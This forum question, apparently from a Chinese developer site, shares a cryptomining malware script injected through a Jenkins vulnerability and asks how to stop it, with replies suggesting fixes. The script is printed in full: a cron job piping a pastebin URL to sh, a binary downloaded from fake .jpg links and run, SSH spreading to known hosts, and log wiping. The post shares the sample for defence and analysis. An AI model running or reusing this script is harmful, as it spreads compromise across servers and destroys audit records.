最近几天爆发的jenkins漏洞感染挖矿病毒有没有办法治治他?

尚浩宇 发布于 02/22 17:04
阅读 718
收藏 1

以下是通过jenkins注入的脚本,注意千万不要运行,不要运行,不要运行

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh" | crontab -

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9
chattr -i /etc/cron.d/root
chattr -i /etc/cron.d/system
chattr -i /etc/ld.so.preload
chattr -i /etc/cron.d/apache
chattr -i /var/spool/cron/root
chattr -i /var/spool/cron/crontabs/root
chattr -i /usr/local/bin/dns
rm -rf /etc/cron.d/system /etc/cron.d/apache /etc/cron.hourly/oanacron /etc/cron.daily/oanacron /etc/cron.monthly/oanacron /usr/local/lib/libntp.so /etc/init.d/netdns /etc/init.d/kworker /bin/httpdns /usr/local/bin/dns
chkconfig --del kworker
chkconfig --del netdns
p=$(ps auxf|grep -v grep|grep ksoftirqds|wc -l)
if [ ${p} -eq 0 ];then
    ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9
fi
if [ -e "/tmp/gates.lod" ]; then
    rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
    kill -9 $(cat /tmp/gates.lod)
    rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
    kill -9 $(cat /tmp/moni.lod)
    rm -rf /tmp/{gates,moni}.lod
fi

if [ ! -f "/tmp/.lsdpid" ]; then
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl -fsSL http://thyrsi.com/t6/672/1550632834x2728279033.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550632834x2728279033.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
    elif [ ${ARCH}x = "i686x" ]; then
        (curl -fsSL http://thyrsi.com/t6/672/1550632869x2728279033.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550632869x2728279033.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
    else
        (curl -fsSL http://thyrsi.com/t6/672/1550632869x2728279033.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550632869x2728279033.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
    fi
        nohup /tmp/watchdogs >/dev/null 2>&1 &
elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl -fsSL http://thyrsi.com/t6/672/1550632834x2728279033.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550632834x2728279033.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
    elif [ ${ARCH}x = "i686x" ]; then
        (curl -fsSL http://thyrsi.com/t6/672/1550632869x2728279033.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550632869x2728279033.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
    else
        (curl -fsSL http://thyrsi.com/t6/672/1550632869x2728279033.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550632869x2728279033.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
    fi
        nohup /tmp/watchdogs >/dev/null 2>&1 &
fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh >/dev/null 2>&1 &' & done
fi
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#

    即使修改了他的挖矿地址,对他也完全没影响啊,怎么能治治他。

加载中
0
湖水没了
湖水没了

在服务器上加个hosts

尚浩宇
尚浩宇
注意脚本里有句chkconfig --del netdns,你配置host是没用了,除非你从机器外部控制,比如云服务器用云控制台,机房用路由器屏蔽
0
守望__
守望__

同中招, 已解决

https://my.oschina.net/u/3473218/blog/3013593

0
开源中国首席弟子
开源中国首席弟子

中招了,直接回滚到前几天快照。辛亏不是数据服务器

尚浩宇
尚浩宇
看来中招的还不少,我还以为是别人针对我们呢,
0
一切已归零
一切已归零
阿里云的安全服务或许会帮到你https://promotion.aliyun.com/ntms/yunparter/invite.html?userCode=duhb3h9n
返回顶部
顶部